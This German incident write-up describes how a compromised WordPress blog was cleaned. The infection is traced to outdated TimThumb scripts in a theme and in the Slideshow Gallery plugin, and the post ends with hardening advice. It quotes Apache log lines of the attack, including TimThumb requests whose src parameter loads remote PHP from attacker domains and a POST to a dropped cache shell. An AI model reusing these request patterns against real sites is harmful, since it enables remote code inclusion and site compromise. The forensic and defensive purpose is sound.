Online-Self-Help
Trojanerwarnung bei Aufruf einer Blogseite

Anfrage: Besucher meiner Webseite beschweren sich, dass der Virenscanner beim Aufruf der Seite eine Trojanerwarnung meldet.

Lösung: Anbei unser Lösungsweg für diese Anfrage.

Symptom: Bei Aufruf der Webseite zeigt der Virenscanner eine Warnmeldung.

Strategische Vorbereitung:

  • Timthumb Vulnerability Scanner ist als Wordpress Plugin installiert
  • Wordpress ist auf dem aktuellsten  Stand

Operationale Vorbereitung:

  • Datenquellen: Wordpress Verzeichnis
  • Virenscan

Datensammlung:

  • Online Virenscanner VirusTotal
  • Wordpress Plugin Antivir
  • Tools: ftp, clamscan

Untersuchung:

  • Prüfen der Webseite bei VirusTotal: kein Fund
  • Sicherung des Wordpress Root-Verzeichnisses auf lokale Festplatte via FTP. Clamscan Durchlauf schließt ohne Fund ab.
  • Aufruf der Webseite mit Mac OS und Firefox: keine Auffälligkeiten
  • Aufruf der Webseite mit Windows und Firefox: Avira zeigt Trojanermeldung. Ein Skript versucht ein PDF herunterzuladen und zu öffnen.
  • Login WP-Admin
  • Installation Wordpress Plugin Antivir und manueller Start: kein Fund
  • Check Wordpress & Plugin Versionen und Recherche, ob bekannte Sicherheitslücken in den vorliegenden Versionen
  • Durchlauf Timthumb Vulnerability Scanner zeigt eine veraltete, unsichere Timthumb Version an

Vorbeugung:

  • Update Timthumb Skript
  • Sicherheitskeys in wp-config.php eingetragen
  • Update Wordpress Plugins
  • Antivir mit täglichem Virenscan und Mailbenachrichtigung konfiguriert
  • Aufruf der Webseite: keine Virenwarnung mehr

Damit dachten wir, dass alles erledigt wäre. Doch ein paar Tage später war die Säuberung wieder hinfällig. Ein weiterer Besucher beschwerte sich über eine Trojaner Meldung. Also mussten wir nochmal genauer suchen.

Operationale Vorbereitung:

  • Datenquellen: Logfiles Apache2 Webserver, Wordpress Verzeichnis, MySQL Datenbank

Datensammlung:

  • Tools: ftp, grep, clamscan, zcat
  • Backup MySQL Datenbank
  • Sicherung des Wordpress Root Verzeichnis inklusive Logfile Verzeichnis

Untersuchung:

  • Virenscan mit Clamscan auf das Wordpress Verzeichnis: ohne Fund
  • Aufruf der Webseite mit vorheriger Deaktivierung des Java Plugins für Firefox unter Windows => keine Trojaner Meldung
  • Aufruf mit aktiviertem Java Plugin unter Windows => Avira schlägt an. Es handelt sich also um ein Java Exploit.
  • Eingrenzung des Verursachers auf eine bestimmte Unterseite des Blogs mit dem Plugin “Slideshow Gallery”
  • Auswertungen Apache2 Logfiles:

======================================================
1xx.53.32.10 - - [14/Dec/2011] “GET //wp-content/themes/irresistible/thumb.php?src=http://blogger.com.test.anime-tv.ro/pl.php HTTP/1.1”

1xx.96.25.14 - - [14/Dec/2011] “POST //wp-content/themes/irresistible/cache/f615d9006ef972e12076b63afbfbac19.php HTTP/1.1” 200 67021 “/wp-content/themes/irresistible/cache/f615d9006ef972e12076b63afbfbac19.php”

======================================================

Hier ist zu erkennen, dass die erste Infizierung über das Timthumb Skript innerhalb des Wordpress Themes erfolgte. Schadecode wurde aus dem Internet nachgeladen (GET) und Daten zu einer im Cache befindlichen PHP Seite übermittelt (POST).

Das Skript wurde jedoch vor ein paar Tagen upgedated. Wie kann es zu einer erneuten Virenverseuchung gekommen sein? Das Apache Logfile gibt Auskunft:

======================================================
2xx.168.198.201 - - [14/Jul/2012] “GET //wp-content/plugins/slideshow-gallery/vendors/timthumb.php?src=http://picasa.com.secretosdecuna.com/logs/timthumb.php HTTP/1.1”
======================================================

Es befindet sich ein weiteres Timthumb Skript in der Wordpress Installation im Ordner des vermuteten Plugins Slideshow Gallery. Warum wurde es vom Vulnerability Scanner nicht entdeckt und upgedated? Die Anzeige der Rechte von timthumb.php lässt erkennen, dass das Skript nur im Schreib- und nicht im Lesezugriff war.

  • Installation des Plugins Theme-Check, welches beim Durchlauf weitere kritische Hinweise liefert, z.B. in der header.php Datei
  • Logfiles mit grep nach weiteren Timthumb Skripten durchsucht. Keine weiteren Funde.

Vorbeugung:

  • Löschen der Daten im Cache Ordner
  • Leserechte für Timthumb Skript vergeben. Durchlauf Vulnerability Scanner und Update des Skriptes.
  • Manuelles Entfernen von Schadcode aus der header.php Datei
  • Kopieren des wp-admin Ordners aus einer frischen Installation
  • Änderung der Passwörter

Ein erneuter Aufruf des Blogs mit einem Windows Rechner und aktiviertem Java Plugin führt zu keiner Warnmeldung seitens des Virenscanners. Sollte das auch nicht von Bestand sein, wäre das letzte Hilfsmittel eine komplette Neu-Installation des gesamtes Blogs.

Empfehlungen:

  1. Wordpress aktuell halten. Updates zeitnah einspielen.
  2. Nur notwendige Plugins installieren und aktivieren. Auch hier die Updates zeitnah einspielen.
  3. Sicherheitskeys in wp-config.php eintragen (https://api.wordpress.org/secret-key/1.1/salt/)
  4. Installation von Plugins zur Überprüfung der Sicherheit, z.B. Timthumb Vulnerability Scanner, Antivirus, Theme-Check
  5. Logfiles gelegentlich auswerten
  6. Einbinden von fremden Inhalten nur wenn unbedingt notwendig und Quelle als sicher empfunden
Posted 10 months ago
Tagged: Wordpress, Blog, Trojaner, Antivirus, Plugin, Timthumb, Forensik, IT-Forensik, Logfile, auswertung, analyse, slideshow, theme, vorbeugung, .